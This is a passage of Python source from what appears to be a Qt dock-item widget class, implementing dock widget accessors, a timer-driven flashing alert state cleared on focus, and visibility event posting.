title_bar.leftDoubleClicked.connect(self.titleBarLeftDoubleClicked)
title_bar.rightClicked.connect(self.titleBarRightClicked)
layout.setTitleBarWidget(title_bar)
def dockWidget(self):
""" Get the dock widget for this dock item.
Returns
-------
result : QWidget or None
The dock widget being managed by this item.
"""
return self.layout().dockWidget()
def setDockWidget(self, widget):
""" Set the dock widget for this dock item.
Parameters
----------
widget : QWidget
The QWidget to use as the dock widget in this item.
"""
self.layout().setDockWidget(widget)
def alert(self, level, on=250, off=250, repeat=4, persist=False):
""" Set the alert level on the dock item.
This will override any currently applied alert level.
Parameters
----------
level : unicode
The alert level token to apply to the dock item.
on : int
The duration of the 'on' cycle, in ms. A value of -1 means
always on.
off : int
The duration of the 'off' cycle, in ms. If 'on' is -1, this
value is ignored.
repeat : int
The number of times to repeat the on-off cycle. If 'on' is
-1, this value is ignored.
persist : bool
Whether to leave the alert in the 'on' state when the cycles
finish. If 'on' is -1, this value is ignored.
"""
if self._alert_data is not None:
self.clearAlert()
app = QApplication.instance()
app.focusChanged.connect(self._onAppFocusChanged)
timer = QTimer()
timer.setSingleShot(True)
timer.timeout.connect(self._onAlertTimer)
on, off, repeat = max(-1, on), max(0, off), max(1, repeat)
self._alert_data = _AlertData(timer, level, on, off, repeat, persist)
if on < 0:
self.alerted.emit(level)
else:
self._onAlertTimer()
def clearAlert(self):
""" Clear the current alert level, if any.
"""
if self._alert_data is not None:
self._alert_data.timer.stop()
self._alert_data = None
app = QApplication.instance()
app.focusChanged.disconnect(self._onAppFocusChanged)
self.alerted.emit(u'')
#--------------------------------------------------------------------------
# Private API
#--------------------------------------------------------------------------
def _onAlertTimer(self):
""" Handle the alert data timer timeout.
This handler will refresh the alert level for the current tick,
or clear|persist the alert level if the ticks have expired.
"""
data = self._alert_data
if data is not None:
if not data.active:
data.active = True
data.timer.start(data.on)
self.alerted.emit(data.level)
else:
data.active = False
data.remaining -= 1
if data.remaining > 0:
data.timer.start(data.off)
self.alerted.emit(u'')
elif data.persist:
data.timer.stop()
self.alerted.emit(data.level)
else:
self.clearAlert()
def _onAlerted(self, level):
""" A signal handler for the 'alerted' signal.
This handler will set the 'alert' dynamic property on the
dock item, the title bar, and the title bar label, and then
repolish all three items.
"""
level = level or None
title_bar = self.titleBarWidget()
label = title_bar.label()
self.setProperty(u'alert', level)
title_bar.setProperty(u'alert', level)
label.setProperty(u'alert', level)
repolish(label)
repolish(title_bar)
repolish(self)
def _onAppFocusChanged(self, old, new):
""" A signal handler for the 'focusChanged' app signal
This handler will clear the alert if one of the descendant
widgets or the item itself gains focus.
"""
while new is not None:
if new is self:
self.clearAlert()
break
new = new.parent()
def _onVisibilityTimer(self):
""" Handle the visibility timer timeout.
This handler will post the dock item visibility event to the
root dock area.
"""
area = self.rootDockArea()
if area is not None and area.dockEventsEnabled():
timer, visible = self._vis_changed
evt_type = DockItemShown if visible else DockItemHidden
event = QDockItemEvent(evt_type, self.objectName())
QApplication.postEvent(area, event)
self._vis_changed = None
def _postVisibilityChange(self, visible):
""" Post a visibility changed event for the dock item.
This method collapses the post on a timer and will not emit
        the event when the visibility temporarily toggles between
states.
Parameters
----------
visible : bool
            True if the item was shown, False if the item was hidden.
"""
area = self.rootDockArea()
if area is not None and area.dockEventsEnabled():
vis_changed = self._vis_changed
if vis_changed is None:
timer = QTimer()
timer.setSingleShot(True)
timer.timeout.connect(self._onVisibilityTimer)
self._vis_changed = (timer, visible)
timer.start()
else:
timer, old_visible = vis_changed
if old_visible != visible:
self._vis_changed = None
timer.stop()
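# Rough usage sketch, not part of the original module: flashing an alert on a dock
# item for four 300 ms on/off cycles and leaving it lit afterwards. A running
# QApplication and a stylesheet keyed on the 'alert' property are assumed.
# item = QDockItem()
# item.setTitle(u'Console')
# item.alert(u'error', on=300, off=300, repeat=4, persist=True)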
|
StarcoderdataPython
|